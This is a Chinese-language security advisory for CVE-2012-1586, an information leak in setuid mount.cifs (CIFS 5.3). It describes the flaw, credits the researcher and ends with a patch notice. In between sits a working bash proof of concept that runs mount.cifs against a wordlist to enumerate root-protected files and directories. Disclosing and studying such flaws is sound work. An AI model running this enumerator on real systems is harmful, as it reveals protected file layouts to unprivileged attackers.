GNU Common Internet File System (CIFS) setuid 'mount.cifs' 信息泄露漏洞
发布日期:2012-04-25
更新日期:2012-04-26
受影响系统:Linux kernel 2.6
Linux kernel 2.4
GNU Common Internet File System (CIFS) 5.3
不受影响系统:GNU Common Internet File System (CIFS) 5.4
描述:
BUGTRAQ ID:
53246
CVE ID:
CVE-2012-1586
CIFS 是通用互联网文件系统协议,它使程序可以访问远程Internet计算机上的文件并要求此计算机的服务。CIFS 使用客户/服务器模式。
Common Internet File System (CIFS)在验证访问权限的实现上存在信息泄露漏洞,如果mount.cifs安装为setuid root程序,则用户可利用它获取文件和目录信息。
<*来源:Jesus Olmos Gonzalez (
jolmos@isecauditors.com)
链接:
https://attachments.samba.org/attachment.cgi?id=7416
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# !/bin/bash
# root enumerator 0day by
jesus.olmos@blueliv.com @sha0coder # discover root protected files & directories, user homes, process descriptors, ...
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1` do
echo $i
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1` do
echo $i
done
rm log.$$
建议:
厂商补丁:
GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.gnu.org浏览次数:2670
严重程度:0(网友投票)
